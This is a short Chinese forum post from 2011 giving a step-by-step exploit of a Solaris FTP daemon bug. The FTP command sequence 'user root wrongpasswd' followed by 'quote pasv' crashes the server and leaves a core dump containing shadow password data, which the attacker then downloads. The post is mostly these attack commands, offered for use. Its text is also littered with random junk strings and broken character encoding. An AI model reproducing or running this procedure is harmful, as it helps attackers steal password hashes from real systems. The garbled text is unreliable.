該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG����,使得用戶可以獲得該機(jī)的口令文件�����。具體過(guò)程如下:
0 K' w' T/ {" {( G. _* ?* [7 V7 X9 x$ Y+ O- \! |" h
1.通過(guò) ftp 正常登錄到目的主機(jī)上% @& c0 B' x) h, b
: L8 }8 a) \, `, j; e, a2.輸入如下命令序列:
% j6 z; G7 `7 O2 X; h' A' t9 g- k1 f, M' L G* b5 }3 @! D) x
ftp> user root wrongpasswd
# |1 v- U( z6 D3 n( E4 h# h% r" |7 G
ftp> quote pasv5 f( O1 j$ r1 {+ j5 a5 m2 i1 H% v
# h# u! \0 u9 }+ P* ?
3.這時(shí)����,ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core���,口令文件就包含在這個(gè)core中��。
) H' W2 w$ Z, ]" z6 l4 G1 ?5 a4 n2 R- z% Y8 u
4.再次進(jìn)入FTP >get core$ k- Q! l( L! w! T1 X
: x/ v) A2 b) G/ r$ X8 |! H補(bǔ)充:雖然在core只有一部分shadow�,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了+ D/ T4 B5 C3 S Y" }. H) s
. m1 f, B: ]5 M$ N; ]( N" R, ^: \ |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡